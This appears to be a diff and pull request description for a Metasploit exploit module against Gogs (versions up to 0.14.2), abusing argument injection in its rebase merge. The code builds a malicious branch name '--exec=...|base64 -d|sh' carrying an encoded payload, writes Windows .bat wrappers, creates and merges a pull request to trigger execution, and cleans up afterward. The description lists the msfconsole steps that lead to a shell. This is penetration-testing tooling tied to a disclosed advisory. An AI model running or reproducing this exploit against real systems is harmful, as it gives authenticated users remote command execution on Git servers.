       'method' => 'POST',
       'uri' => full_uri,
       'ctype' => 'application/x-www-form-urlencoded',
       'keep_cookies' => true,
       'vars_post' => post_data
-    }, timeout)
+    )
   end
 
   def get_csrf(uri)
@@ -687,12 +603,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def extract_csrf(res)
     fail_with(Failure::Unreachable, 'No response to extract CSRF from') unless res
 
-    match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
-    match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
-    match ||= res.body.to_s.match(/name="_csrf"\s+(?:content|value)="(?<value>[^"]+)"/)
-    fail_with(Failure::NotFound, 'CSRF token not found in response') unless match
+    doc = res.get_html_document
+    csrf = doc.at_xpath("//input[@name='_csrf']/@value")&.text
+    fail_with(Failure::NotFound, 'CSRF token not found in response') if csrf.blank?
 
-    match[:value]
+    csrf
   end
 
   def basic_auth(user, pass)
@@ -736,17 +651,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def cleanup_own_repo
     print_status("Cleaning up - deleting repository #{@repo_name}")
 
-    send_request_cgi({
+    send_request_cgi(
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, '/api/v1/repos/', @repo_path),
       'headers' => { 'Authorization' => "token #{@api_token}" }
-    }, 5)
+    )
 
-    verify = send_request_cgi({
+    verify = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/api/v1/repos/', @repo_path),
       'headers' => { 'Authorization' => "token #{@api_token}" }
-    }, 5)
+    )
 
     if verify&.code == 404
       print_good("Repository #{@repo_name} deleted")
@@ -796,11 +711,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # GET the PR page for CSRF (must use /pulls/ path; /issues/ redirects)
     pr_page = normalize_uri(target_uri.path, @repo_path, 'pulls', @pr_number)
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri' => pr_page,
       'keep_cookies' => true
-    }, 10)
+    )
 
     unless res
       print_warning("Could not load PR page to close PR ##{@pr_number}")
@@ -808,26 +723,25 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Extract CSRF without fail_with (cleanup must not abort)
-    csrf_match = res.body.to_s.match(/<input [^>]*name="_csrf" [^>]*value="(?<value>[^"]+)"/)
-    csrf_match ||= res.body.to_s.match(/<input [^>]*value="(?<value>[^"]+)" [^>]*name="_csrf"/)
-    csrf_match ||= res.body.to_s.match(/name="_csrf"\s+(?:content|value)="(?<value>[^"]+)"/)
-    unless csrf_match
+    doc = res.get_html_document
+    csrf = doc.at_xpath("//input[@name='_csrf']/@value")&.text
+    unless csrf
       print_warning("Could not find CSRF token to close PR ##{@pr_number}")
       return
     end
 
     comment_uri = normalize_uri(target_uri.path, @repo_path, 'issues', @pr_number, 'comments')
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => comment_uri,
       'keep_cookies' => true,
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => {
-        '_csrf' => csrf_match[:value],
+        '_csrf' => csrf,
         'status' => 'close',
         'content' => ''
       }
-    }, 10)
+    )
 
     if res && [200, 302].include?(res.code)
       print_good("PR ##{@pr_number} closed")

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -169,19 +169,18 @@ class MetasploitModule < Msf::Exploit::Remote
       host: rhost,
       port: rport,
       proto: 'tcp',
-      name: 'gogs',
-      info: 'Gogs Git Service',
+      name: 'Gogs Git Service',
+      resource: { base_url: normalize_uri(target_uri.path) },
       parents: {
-        name: datastore['SSL'] ? 'https' : 'http',
         host: rhost,
         port: rport,
         proto: 'tcp',
+        name: datastore['SSL'] ? 'https' : 'http',
         parents: {
-          name: 'tcp',
           host: rhost,
           port: rport,
           proto: 'tcp',
-          parents: nil
+          name: 'tcp'
         }
       }
     )

--- a/modules/exploits/multi/http/gogs_rebase_rce.rb
+++ b/modules/exploits/multi/http/gogs_rebase_rce.rb
@@ -45,11 +45,13 @@ class MetasploitModule < Msf::Exploit::Remote
           rebase merge to execute the payload. A local git installation
           is required.
 
-          The payload is delivered via a script file committed to the
-          repository, avoiding filesystem character restrictions on
-          Windows (NTFS) targets. Git for Windows uses MSYS2 sh for
-          --exec commands, enabling cross-platform exploitation of both
-          Linux and Windows Gogs instances.
+          On Unix targets, the payload is base64-encoded inline in
+          the malicious branch name, avoiding the need to commit files
+          to the repository. On Windows targets, the payload is
+          delivered via a script file committed to the repository,
+          since NTFS forbids pipe characters in filenames. Git for
+          Windows uses MSYS2 sh for --exec commands, enabling
+          cross-platform exploitation.
 
           Note: a successful rebase merge may leave the server-side
           repository in a corrupted git state (mid-rebase). For
@@ -196,6 +198,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if version
       ver = Rex::Version.new(version)
+      # NOTE: No fix exists yet. We assume a future version > 0.14.2 will
+      # include a patch. If the next release (e.g. 0.14.3) is still
+      # vulnerable, update this threshold accordingly.
       if ver <= Rex::Version.new('0.14.2')
         return CheckCode::Appears("Gogs #{version} detected.")
       else
@@ -248,39 +253,52 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target['Type']
-    when :unix_cmd, :win_cmd
+    when :unix_cmd
+      # Base64-encode the payload inline in the branch name. Pipes are
+      # valid in Linux/macOS refs but forbidden on NTFS, so this is
+      # Unix-only. No script file needs to be committed to the repo.
+      wrapped = "(#{payload.encoded}) </dev/null >/dev/null 2>&1 &"
+      b64 = Rex::Text.encode_base64(wrapped)
+      # Git ref names forbid '//'; re-pad with leading spaces until safe
+      padding = 0
+      while b64.include?('//') && padding < 50
+        padding += 1
+        b64 = Rex::Text.encode_base64(' ' * padding + wrapped)
+      end
+      @malicious_branch = "--exec=echo${IFS}#{b64}|base64${IFS}-d|sh"
+
+    when :win_cmd
+      # NTFS forbids | in filenames so we can't use the base64|sh
+      # approach. Instead, commit a script file to the repo.
+      # MSYS2 sh mangles $, & etc. so write the payload to a .bat and
+      # have the sh wrapper invoke cmd.exe instead.
       rand_name = Rex::Text.rand_text_alpha_lower(6)
       @payload_content = payload.encoded
       @payload_file = ".#{rand_name}"
+      @bat_file = ".#{rand_name}.bat"
       @malicious_branch = "--exec=sh${IFS}#{@payload_file}"
-
-      if target['Type'] == :win_cmd
-        # MSYS2 sh mangles $, & etc. so write the payload to a .bat and
-        # have the sh wrapper invoke cmd.exe instead.
-        @bat_file = ".#{rand_name}.bat"
-      end
-
-      print_status('Pushing branches via git')
-      setup_branches_via_git
-      print_good('Branches pushed')
-
-      print_status('Creating pull request')
-      @pr_number = create_pull_request
-      print_good("PR ##{@pr_number} created")
-
-      print_status('Triggering rebase merge')
-      trigger_rebase_merge
-      report_vuln(
-        host: rhost,
-        port: rport,
-        proto: 'tcp',
-        name: name,
-        info: "Exploited via #{datastore['EXPLOIT_METHOD']} method",
-        refs: references,
-        service: report_gogs_service('Gogs Git Service')
-      )
-      print_good('Rebase merge triggered, waiting for shell...')
     end
+
+    print_status('Pushing branches via git')
+    setup_branches_via_git
+    print_good('Branches pushed')
+
+    print_status('Creating pull request')
+    @pr_number = create_pull_request
+    print_good("PR ##{@pr_number} created")
+
+    print_status('Triggering rebase merge')
+    trigger_rebase_merge
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      info: "Exploited via #{datastore['EXPLOIT_METHOD']} method",
+      refs: references,
+      service: report_gogs_service('Gogs Git Service')
+    )
+    print_good('Rebase merge triggered, waiting for shell...')
   end
 
   # ---------------------------------------------------------------
@@ -398,7 +416,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Branch setup via local git
   # ---------------------------------------------------------------
 
-  def setup_branches_via_git(include_malicious: true)
+  def setup_branches_via_git
     @tmpdir = Dir.mktmpdir('msf_gogs_')
     workdir = File.join(@tmpdir, 'work')
     clone_url = build_clone_url
@@ -433,27 +451,21 @@ class MetasploitModule < Msf::Exploit::Remote
     run_git!(['checkout', base_branch], workdir)
     File.write(File.join(workdir, 'diverge.txt'), Rex::Text.rand_text_alpha(8))
 
-    # Write payload to a script file in the repo. All wrappers background
-    # the process and detach fds so sh returns and git rebase can finish.
-    if include_malicious
-      if @bat_file
-        # sh wrapper -> cmd.exe -> .bat (//c prevents MSYS2 path conversion)
-        File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
-        File.write(File.join(workdir, @bat_file), @payload_content + "\n")
-      elsif @payload_content
-        File.write(File.join(workdir, @payload_file), "(#{@payload_content}) </dev/null >/dev/null 2>&1 &\n")
-      end
+    # Write payload script files for Windows targets. Linux uses
+    # base64-encoded payload inline in the branch name instead.
+    if @bat_file
+      # sh wrapper -> cmd.exe -> .bat (//c prevents MSYS2 path conversion)
+      File.write(File.join(workdir, @payload_file), "cmd.exe //c #{@bat_file} </dev/null >/dev/null 2>&1 &\n")
+      File.write(File.join(workdir, @bat_file), @payload_content + "\n")
     end
 
     run_git!(['add', '.'], workdir)
     run_git!(['commit', '-m', 'diverge'], workdir)
 
-    if include_malicious
-      # Push malicious branch via refspec (bypasses checkout -b validation).
-      # Don't push to the base branch itself (especially for existing_repo).
-      run_git!(['push', 'origin', "HEAD:refs/heads/#{@malicious_branch}"], workdir)
-      vprint_good("Malicious branch: #{@malicious_branch}")
-    end
+    # Push malicious branch via refspec (bypasses checkout -b validation).
+    # Don't push to the base branch itself (especially for existing_repo).
+    run_git!(['push', 'origin', "HEAD:refs/heads/#{@malicious_branch}"], workdir)
+    vprint_good("Malicious branch: #{@malicious_branch}")
 
     vprint_good("Feature branch: #{@feature_branch}")
   end
@@ -617,6 +629,17 @@ class MetasploitModule < Msf::Exploit::Remote
     "Basic #{Rex::Text.encode_base64("#{user}:#{pass}")}"
   end
 
+  # Returns a service object for linking to report_vuln
+  def report_gogs_service(info)
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'gogs',
+      info: info
+    )
+  end
+
   # ---------------------------------------------------------------
   # Cleanup
   # ---------------------------------------------------------------
@@ -625,7 +648,6 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     if @need_cleanup
-
       if own_repo?
         cleanup_own_repo
       else


### PR DESCRIPTION
Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).

The `Merge()` function in `internal/database/pull.go` passes the PR base branch name to `git rebase` without a `--` separator. A branch named `--exec=<CMD>` is parsed by Git as the `--exec` flag rather than a positional argument, causing `sh -c <CMD>` to run after each replayed commit during the rebase.

Any authenticated user who can create a repository (the default configuration) can exploit this — no interaction from other users is required.

- **GHSA**: [GHSA-qf6p-p7ww-cwr9](https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9)
- **Blog**: [Technical Analysis](https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed)
- **Affected**: Gogs <= 0.14.2 and 0.15.0+dev
- **Targets**: Unix Command, Linux Dropper, Windows Command, Windows Dropper
- **Exploit methods**: `own_repo` (creates temp repo, default) and `existing_repo` (targets a repo the attacker has write access to)

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/gogs_rebase_rce`
- [ ] `set RHOSTS <target>`
- [ ] `set USERNAME <gogs_user>`
- [ ] `set PASSWORD <gogs_password>`
- [ ] `set LHOST <your_ip>`
- [ ] `check` — should detect Gogs version
- [ ] `run` — should get a shell as the Gogs process user
- [ ] **Verify** cleanup deletes the temporary repository
- [ ] `set EXPLOIT_METHOD existing_repo`
- [ ] `set REPO_OWNER <owner>` / `set REPO_NAME <repo>`
- [ ] `run` — should get a shell; cleanup deletes branches and closes the PR
- [ ] `set TARGET 2` (Windows Command) — repeat against a Windows Gogs instance
- [ ] **Verify** `msftidy`, `rubocop`, and `msftidy_docs` pass with no offenses